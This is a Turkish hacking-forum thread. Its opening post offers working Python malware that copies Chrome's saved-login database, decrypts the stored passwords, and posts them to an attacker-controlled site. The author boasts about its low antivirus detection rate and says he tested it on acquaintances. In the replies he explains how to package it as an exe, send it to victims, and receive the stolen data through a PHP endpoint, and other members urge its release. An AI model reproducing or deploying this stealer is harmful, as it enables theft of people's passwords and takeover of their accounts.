İPUCU

Python Artificial Intelligence’da en çok kullanılan dildir ve gerekli dökümanların paylaşım alanlar burada paylaşılmaktadır.

Anket Sonuçları: Sizce virüs iyimi ?(ilk virüsüm)
İyi 13 61,90%
Orta 5 23,81%
Kötü 3 14,29%
Katılımcı sayısı: 21. Sizin bu Ankette oy kullanma yetkiniz bulunmuyor

Seçenekler

Python Chrome Şifre Çalma Ve Sitenize Gönderme

XEON0 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
18
Konular:
5
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Ticaret:
(0) %
30-04-2017 23:48
#1
Angry
Python Chrome Şifre Çalma Ve Sitenize Gönderme
Arkadaşlar öncelikle bu ilk konum hatta yeni üyeyim herpinize merhaba.

Neden 'Acil' yazdım derseniz bu benim yazdıgım bir virüstü aslında daha çok tepki için yapmıştım ama sonradan büyüdü ve bu hale geldi herneyse asıl acil yazma nedenim virüsün
'THOR APT Scanner' tarafından bulunmasından kaynaklanıyor.

Şimdi virüsün çalışma mantıgını ve özelliklerini anlatayım.

1.Powered By

2.Hızlı

3.Hala virustotal'de bulunması 10 \ 61

Mantığı İse Şöyle
Chrome bütün bilgileriniz sqlite veritabanlarında tutar bunlar şifrelidir fakat kırması base64 gibi kolaydır(kırmak win32crypt kullanılır) ben bunları kendi siteme yönlendiren bir kod yazdım buda alınan bütün şifrelerj bana gönderiyordu(Sadece belirli 'TANIDIK' kişilerde denedim fakat bir şekilde bulundu virüsüm büyük ihtimalle tanıdıklarımın pc'lerindeki virüs programları gönderdi.)


Kod:
# -*- coding: utf-8 -*-

__author__ = "XEON"
__credits__ = ["XEON"]


import sqlite3 #veritabanı baglantısını saglayacak
import win32crypt #şifreli verileri kıracak
from shutil import copy2 #veritabanarı chrome açıkken kitli olurlar o yüzden kopyalayıp okuyoruz dosyayı
from os import getenv # %appdata% gibi kısayolları okuyabilmek için kodda LOCALAPPDATA yı aktardım
from tempfile import gettempdir #Temp kalsörünü almak için getenv çalışmadı
from requests import post #aldıgım verileri siteme submitlemek için

output="" #çıktıları biriktirmek için


#Veritabanlarını kopyalıyoruz
def copy():
    copy2(getenv("LOCALAPPDATA")+"\\Google\\Chrome\\User Data\\Default\\Login Data", gettempdir() + "\\undefined0")

#veritabanlarını kopyaladımız konumdan giriş bilgilerini okuyup output degişkenine dolduruyoruz
def getlogindatas():
    global output
    conn = sqlite3.connect(gettempdir() + "\\undefined0")
    cursor = conn.execute("SELECT password_value, username_value,origin_url FROM logins;")
    for row in cursor:
        output = output + "URL: " + str(row[2]) + " Username: " + str(row[1]) + " Password: " + str(win32crypt.CryptUnprotectData(row[0])[1]) + "\n"
    conn.close()

#alınan output sitenize gönderilir url kısmı bildigimiz url, datafield kısmı ise postlanacak verinin hangi form alanı olarak gönderilecigi
def postsite(url, datafield):
    global output
    post(url, data = {datafield: str(output)})


#dosyayı kopyalamasını eger kopyalayamassa programı kapatması söylüyorum çünkü buna ya yetersiz yetki sebep olur yada chrome kurulu olmaması
try:copy()
except:
    exit()


#giriş bilgilerini al yapamazsa devam etsin belki önceki aşamalarda birkaç bilgi depolamisitir.
try:getlogindatas()
except:pass

#eger output degişkeni boş degil ise gönder eger boş ise programı kapat
if output != "":
    postsite("http://siteniz.com", "parolaalani")
else:
    exit()
Evet arkadaşlar gördügünüz üzere çok kolay bu programı kendi buldugum bir yöntemle şifreledim onda bulunma oranı daha düşük eger oda patlarsa(patlamaya yakın zamanda) yayınlarım ama eğer patlamas ise kalır umarım begenirsiniz dedigim gibi buradaki ilk konum hatam olduysa kusura bakmayın kendinize iyi bakın.

!!DİKKAT!! Bu virus yüzünden başınıza gelebilecek sorumlulugu üstlenmiyor ve bütün yaptıklarınız kendi sorumlulugunuzdur.
Konu Petroff `` tarafından (02-05-2017 03:53 Saat 03:53 ) değiştirilmiştir.
hasan_012 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2009
Nereden:
ADANALI
Mesajlar:
1.017
Konular:
108
Teşekkür (Etti):
96
Teşekkür (Aldı):
55
Ticaret:
(0) %
01-05-2017 10:27
#2
bu kodu nerye yazcaz onu anlamadım
XEON0 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
18
Konular:
5
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Ticaret:
(0) %
01-05-2017 10:36
#3
Alıntı:
hasan_012´isimli üyeden Alıntı Mesajı göster
bu kodu nerye yazcaz onu anlamadım
Python kodu Python idle a yaz yada pyinstaller kullanıp exe haline getirir millete atarsın
Pip kullanarak pyinstaller yukleyebilirsin
REBDAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
358
Konular:
54
Teşekkür (Etti):
40
Teşekkür (Aldı):
13
Ticaret:
(0) %
01-05-2017 10:44
#4
daha detayli anlatsaydin keske . Bu arada calinti kredi kartlari ciddi bir suctur . Kullanan arkadaslar dikkatli olsun ve Türk vatandaslarina zarar vermek misyona aykiri.
XEON0 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
18
Konular:
5
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Ticaret:
(0) %
01-05-2017 10:47
#5
Alıntı:
REBDAY´isimli üyeden Alıntı Mesajı göster
daha detayli anlatsaydin keske . Bu arada calinti kredi kartlari ciddi bir suctur . Kullanan arkadaslar dikkatli olsun ve Türk vatandaslarina zarar vermek misyona aykiri.
Sizce kredi kartı kısmını kaldırmalı miyim?
SeeBekO - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2017
Mesajlar:
241
Konular:
55
Teşekkür (Etti):
20
Teşekkür (Aldı):
13
Ticaret:
(0) %
01-05-2017 10:57
#6
Aga sen bu virüsü piyasaya sür sağlam bir virüs bulunmaması içinde çalış bulunmasın çok iyi bir virüs yapmışın helaal olsun !
XEON0 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
18
Konular:
5
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Ticaret:
(0) %
01-05-2017 10:59
#7
Alıntı:
SeeBekO´isimli üyeden Alıntı Mesajı göster
Aga sen bu virüsü piyasaya sür sağlam bir virüs bulunmaması içinde çalış bulunmasın çok iyi bir virüs yapmışın helaal olsun !
Teşekkürler fakat kredi kartı kısmını sildim sadece giriş bilgilerini çalmaya ayarladım kodu bilgilerinize.
veyselozeek - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Nereden:
/index.php
Mesajlar:
1.414
Konular:
140
Teşekkür (Etti):
136
Teşekkür (Aldı):
186
Ticaret:
(0) %
01-05-2017 11:03
#8
bilgiler bize nasıl gelicek anlamadım
--------------------- Aklınıza Takılan En Ufak Bir Şeyi 7/24 Sorabilirsiniz

Sosyal Mühendislik Kulübü Mezun.
XEON0 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
18
Konular:
5
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Ticaret:
(0) %
01-05-2017 11:16
#9
Alıntı:
veyselozeek´isimli üyeden Alıntı Mesajı göster
bilgiler bize nasıl gelicek anlamadım
Hocam örnek PHP kodunu direk yazmak isterdim fakat birazdan dışarı çıkacağım ve telefondayim kısaca şöyle anlatayim kodun en son kısmında post isteği yapıyorum.

URL kısmına kendi sitenizdeki PHP kodunun bulunduğu kısmı yazarsinız datafield kisminada post ta gidecek verinin hangi adda gideceği örneğin html formlarda inputlara name kısmında belirtiriz bende datafield dedim kendi kodumda.

Örneğin PHP de $_POST["datafilede ne yazdiysaniz o']'a gelen veriyi veritabanına kaydedersiniz
versen5656 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Mesajlar:
3.321
Konular:
68
Teşekkür (Etti):
10
Teşekkür (Aldı):
355
Ticaret:
(0) %
01-05-2017 11:25
#10
Alıntı:
XEON0´isimli üyeden Alıntı Mesajı göster
Sizce kredi kartı kısmını kaldırmalı miyim?
gerek yok
--------------------- 10101010101010100101010100000101010101
1111 0000 1111 000 111 000 11100 11111 00000 1111 0000 000111 188 177 191 178 185 184 186 187 192 193 190 178 179 175 176 194 195 196 197
101010101010101010100101

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı